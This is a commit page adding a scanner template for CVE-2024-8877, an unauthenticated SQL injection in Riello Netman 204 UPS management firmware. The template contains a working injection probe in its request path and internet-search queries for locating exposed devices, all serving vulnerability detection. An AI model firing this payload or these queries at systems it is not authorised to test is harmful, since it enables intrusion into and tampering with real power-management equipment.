Merge pull request #10903 from Kazgangap/CVE-2024-8877

add CVE-2024-8877
patch-12
Dhiyaneshwaran 2024-10-04 17:07:35 +05:30 committed by GitHub
commit ba48b5263a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 42 additions and 0 deletions

View File

@ -0,0 +1,42 @@
id: CVE-2024-8877
info:
name: Riello Netman 204 - SQL Injection
author: s4e-io
severity: critical
description: |
The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.
reference:
- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-riello-netman-204/index.html
- https://0day.today/exploit/39757
- https://nvd.nist.gov/vuln/detail/CVE-2024-8877
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-8877
cwe-id: CWE-89
epss-score: 0.00091
epss-percentile: 0.39654
cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: riello-ups
product: netman_204_firmware
shodan-query: title:"netman 204"
fofa-query: title="netman 204"
censys-query: services.http.response.body:"netman204"
google-query: intitle:"netman 204"
tags: cve,cve2024,netman,sqli
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "START APPLICATION", "category\":", "codeStr\":")'
- 'status_code == 200'
condition: and